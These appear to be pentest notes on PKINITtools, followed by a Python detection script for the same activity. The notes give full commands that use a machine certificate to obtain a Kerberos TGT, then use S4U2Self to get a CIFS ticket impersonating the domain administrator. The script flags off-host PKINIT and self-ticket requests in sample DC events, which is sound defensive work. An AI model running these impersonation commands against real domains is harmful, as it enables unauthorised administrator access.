Install
cd /opt/
git clone https://github.com/dirkjanm/PKINITtools.git
cd PKINITtools
virtualenv -p python3 env
source env/bin/activate
python3 -m pip install -r requirements.txt
gettgtpkinit.py
This tool requests a Kerberos TGT for a machine account via PKINIT, authenticating with the machine's certificate.
python3 gettgtpkinit.py -cert-pfx VlQaF13b.pfx -pfx-pass B2eQ4h9S4IgU1eeQ2OMb example.com/DB-SRV01$ db-srv01.ccache
gets4uticket.py
This tool uses S4U2Self to request a service ticket that impersonates another principal. The ticket is constrained to the machine whose account you own.
Note:
- The kerberos+ccache URL can point at a DC by IP address, for example:
kerberos+ccache://example.com\\db-srv01\$:db-srv01.ccache@10.10.10.10
- However, the cifs entry in the command below must be cifs/ followed by a valid machine UPN.
python3 gets4uticket.py kerberos+ccache://example.com\\db-srv01\$:db-srv01.ccache@dc01.example.com cifs/db-srv01.example.com@example.com administrator@example.com admin.ccache
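Detection side of the two requests above, as an added example that is not part of PKINITtools or the original notes. It scans DC Security events 4768 and 4769 for a machine account that gets a PKINIT TGT (PreAuthType 16) and then a ticket to itself from an address that is not the machine's own. The sample events, the KNOWN_HOSTS inventory, the function names and the alert labels are constructed assumptions.

```python
# Constructed sample events (not real logs). Field names follow the EventData of
# Windows Security events 4768 (TGT requested) and 4769 (service ticket requested).
EVENTS = [
    {"EventID": 4768, "TargetUserName": "DB-SRV01$", "PreAuthType": "16",
     "IpAddress": "::ffff:10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "DB-SRV01$@EXAMPLE.COM",
     "ServiceName": "DB-SRV01$", "IpAddress": "::ffff:10.10.10.50"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "IpAddress": "::ffff:10.10.10.21"},
    {"EventID": 4769, "TargetUserName": "WEB01$@EXAMPLE.COM",
     "ServiceName": "WEB01$", "IpAddress": "::ffff:10.10.10.30"},
]

# Assumed inventory: the address each machine account normally authenticates from.
KNOWN_HOSTS = {"DB-SRV01$": "10.10.10.20", "WEB01$": "10.10.10.30"}


def account(name):
    """Normalise 'DB-SRV01$@EXAMPLE.COM' to 'DB-SRV01$' (4769 appends the realm)."""
    return name.split("@")[0].upper()


def findings(events, known_hosts):
    """Return (label, account, source_ip) tuples for suspicious machine-account requests."""
    alerts = []
    pkinit_seen = set()  # (account, ip) pairs that already got an off-host PKINIT TGT
    for ev in events:
        acct = account(ev["TargetUserName"])
        if not acct.endswith("$"):
            continue  # only machine accounts are of interest here
        ip = ev["IpAddress"].replace("::ffff:", "")  # drop IPv4-mapped prefix
        # Accounts missing from the inventory are treated as off-host.
        off_host = known_hosts.get(acct) != ip
        if not off_host:
            continue  # a machine talking to the DC from its own address
        if ev["EventID"] == 4768 and ev.get("PreAuthType") == "16":
            pkinit_seen.add((acct, ip))
            alerts.append(("pkinit-tgt-off-host", acct, ip))
        elif ev["EventID"] == 4769 and account(ev["ServiceName"]) == acct:
            # Requester and service are the same account: the S4U2Self shape.
            label = ("s4u2self-after-pkinit" if (acct, ip) in pkinit_seen
                     else "self-ticket-off-host")
            alerts.append((label, acct, ip))
    return alerts


if __name__ == "__main__":
    for alert in findings(EVENTS, KNOWN_HOSTS):
        print(alert)
```

A machine requesting a ticket to itself is normal when it comes from the machine's own address, so the source-address comparison is what carries the signal here.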